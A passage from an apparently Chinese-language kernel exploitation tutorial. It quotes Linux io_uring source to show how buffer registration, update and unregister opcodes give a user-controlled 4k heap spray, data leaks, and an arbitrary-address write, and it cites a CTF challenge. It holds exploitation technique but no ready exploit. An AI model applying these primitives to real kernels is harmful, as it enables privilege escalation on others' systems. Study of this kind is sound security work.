if (rr.flags & IORING_RSRC_REGISTER_SPARSE && rr.data)
break;
return io_sqe_buffers_register(ctx, u64_to_user_ptr(rr.data), // 对应 IORING_REGISTER_BUFFERS2 opcode
rr.nr, u64_to_user_ptr(rr.tags));
}
return -EINVAL;
}
  • 调用 io_rsrc_data_alloc 函数分配一个 io_rsrc_data 结构体,大小为80,flag 为 GFP_KERNEL,从 kmalloc-96 中取。
  • 调用 io_alloc_page_table 函数分配指针数组,可以根据传入的 size 分配对应数量大小为 4k 的内核对象,分配 flag 为 GFP_KERNEL_ACCOUNT

这里 size 是我们用户可控的,因此可以通过控制 size 来控制指针数组大小以及分配的 4k 内核对象数量:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
static __cold void **io_alloc_page_table(size_t size)
{
unsigned i, nr_tables = DIV_ROUND_UP(size, PAGE_SIZE);
size_t init_size = size;
void **table;

table = kcalloc(nr_tables, sizeof(*table), GFP_KERNEL_ACCOUNT);
if (!table)
return NULL;

for (i = 0; i < nr_tables; i++) {
unsigned int this_size = min_t(size_t, size, PAGE_SIZE);

table[i] = kzalloc(this_size, GFP_KERNEL_ACCOUNT);
if (!table[i]) {
io_free_page_table(table, init_size);
return NULL;
}
size -= this_size;
}
return table;
}

完成内存分配后进行数据拷贝,4k 内核对象可以全部存储来自用户空间的数据:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
__cold static int io_rsrc_data_alloc(struct io_ring_ctx *ctx,
rsrc_put_fn *do_put, u64 __user *utags,
unsigned nr, struct io_rsrc_data **pdata)
{
...

data->nr = nr;
data->ctx = ctx;
data->do_put = do_put;
if (utags) {
ret = -EFAULT;
for (i = 0; i < nr; i++) {
u64 *tag_slot = io_get_tag_slot(data, i);

if (copy_from_user(tag_slot, &utags[i],
sizeof(*tag_slot)))
goto fail;
}
}

atomic_set(&data->refs, 1);
init_completion(&data->done);
*pdata = data;
return 0;
fail:
io_rsrc_data_free(data);
return ret;
}

需要注意 io_sqe_buffers_registers 函数有额外的分配噪音: io_buffers_map_alloc(ctx, nr_args); 函数

编辑

当我们完成 4k 对象的分配之后,我们还可以通过 IORING_REGISTER_BUFFERS_UPDATE opcode 更新 4k 内核对象中的数据,最后会调用到 __io_sqe_buffers_update()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
static int __io_sqe_buffers_update(struct io_ring_ctx *ctx,
struct io_uring_rsrc_update2 *up,
unsigned int nr_args)
{
u64 __user *tags = u64_to_user_ptr(up->tags);
struct iovec iov, __user *iovs = u64_to_user_ptr(up->data);
struct page *last_hpage = NULL;
bool needs_switch = false;
__u32 done;
int i, err;

if (!ctx->buf_data)
return -ENXIO;
if (up->offset + nr_args > ctx->nr_user_bufs)
return -EINVAL;

for (done = 0; done < nr_args; done++) {
struct io_mapped_ubuf *imu;
int offset = up->offset + done;
u64 tag = 0;

err = io_copy_iov(ctx, &iov, iovs, done);
if (err)
break;
if (tags && copy_from_user(&tag, &tags[done], sizeof(tag))) {
err = -EFAULT;
break;
}
err = io_buffer_validate(&iov);
if (err)
break;
if (!iov.iov_base && tag) {
err = -EINVAL;
break;
}
err = io_sqe_buffer_register(ctx, &iov, &imu, &last_hpage);
if (err)
break;

i = array_index_nospec(offset, ctx->nr_user_bufs);
if (ctx->user_bufs[i] != ctx->dummy_ubuf) {
err = io_queue_rsrc_removal(ctx->buf_data, i,
ctx->rsrc_node, ctx->user_bufs[i]);
if (unlikely(err)) {
io_buffer_unmap(ctx, &imu);
break;
}
ctx->user_bufs[i] = ctx->dummy_ubuf;
needs_switch = true;
}

ctx->user_bufs[i] = imu;
*io_get_tag_slot(ctx->buf_data, i) = tag;
}

if (needs_switch)
io_rsrc_node_switch(ctx, ctx->buf_data);
return done ? done : err;
}

读取/写入

IORING_REGISTER_BUFFERS2 本身的含义便是将多个缓冲区提前注册到内核中以辅助 io_uring 的使用,因此我们可以通过 io_uring 本身的功能提交 SQE 将数据从文件中拷贝到缓冲区,或是从缓冲区读取到文件

因此我们可以在用户空间使用管道来将这些 4k 缓冲区的数据读取到用户空间,或是将管道/文件中的数据写入这些内核缓冲区

释放

既然有对应分配的 register,自然也有对应释放的 unregister,我们可以通过 IORING_UNREGISTER_BUFFERS opcode 释放之前分配的内存,最后会调用到 io_rsrc_data_free() 进行释放:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static void io_free_page_table(void **table, size_t size)
{
unsigned i, nr_tables = DIV_ROUND_UP(size, PAGE_SIZE);

for (i = 0; i < nr_tables; i++)
kfree(table[i]);
kfree(table);
}

static void io_rsrc_data_free(struct io_rsrc_data *data)
{
size_t size = data->nr * sizeof(data->tags[0][0]);

if (data->tags)
io_free_page_table((void **)data->tags, size);
kfree(data);
}

数据泄漏

内核“堆”上地址

由于指针数组中存放的直接就是指向内核对象的指针,而且该对象使用的通用分配 flag GFP_KERNEL_ACCOUNT。

任意地址写

如果可以修改指针数组中的指针,就可以通过 update 功能进行任意地址写。

若我们能够多次修改指针数组中的指针,则还可以进行堆基址的爆破(因为用的是 copy_from_user() 所以是🆗的)

例题:RCTF2022-game

RCTF2022-game

参考链接